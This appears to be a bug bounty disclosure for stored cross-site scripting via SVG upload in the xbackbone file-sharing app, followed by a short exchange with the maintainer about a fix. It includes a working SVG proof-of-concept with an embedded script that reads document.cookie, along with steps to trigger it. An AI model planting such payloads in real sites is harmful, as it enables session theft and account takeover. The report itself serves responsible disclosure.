Cross-site Scripting (XSS) - Stored in sergix44/xbackbone
Reported on
Jul 6th 2021
✍️ Description
Stored xss through file upload via a .svg file
🕵️♂️ Proof of Concept
Upload a .svg file with the following content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
give a name you want ending with .svg (store-xss.svg) for example and upload the file, after upload click on open
click on raw
see the stored-xss getting executed.
💥 Impact
Possible to steal admin cookies or take over another account via cookie grepping.
💥 Remediation
Force the file to be downloaded instead of opening.
💥 References
https://owasp.org/www-community/attacks/xss/
https://en.wikipedia.org/wiki/Cross-site_scripting
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/
Occurrences
Hi! Thanks for your work. All the cookies used by XBB are set by the backend as http only. So no remember tokens or session token should be leaked with this attack. I'm going to make a patch, to return the svg as plain-text when using the raw mode. What do you think?
Hi thnx for the response. Yeah that would be great solution. An xss attack would not be possible
@maintainer Hi is it possible that you accept this as a bug ( as well as the other report) in that way i am getting paid through the huntr.dev platform
Yah great work guys ...
For your interest with XSS we can do many things other than steal cookies..
just to want say somethings for get more information.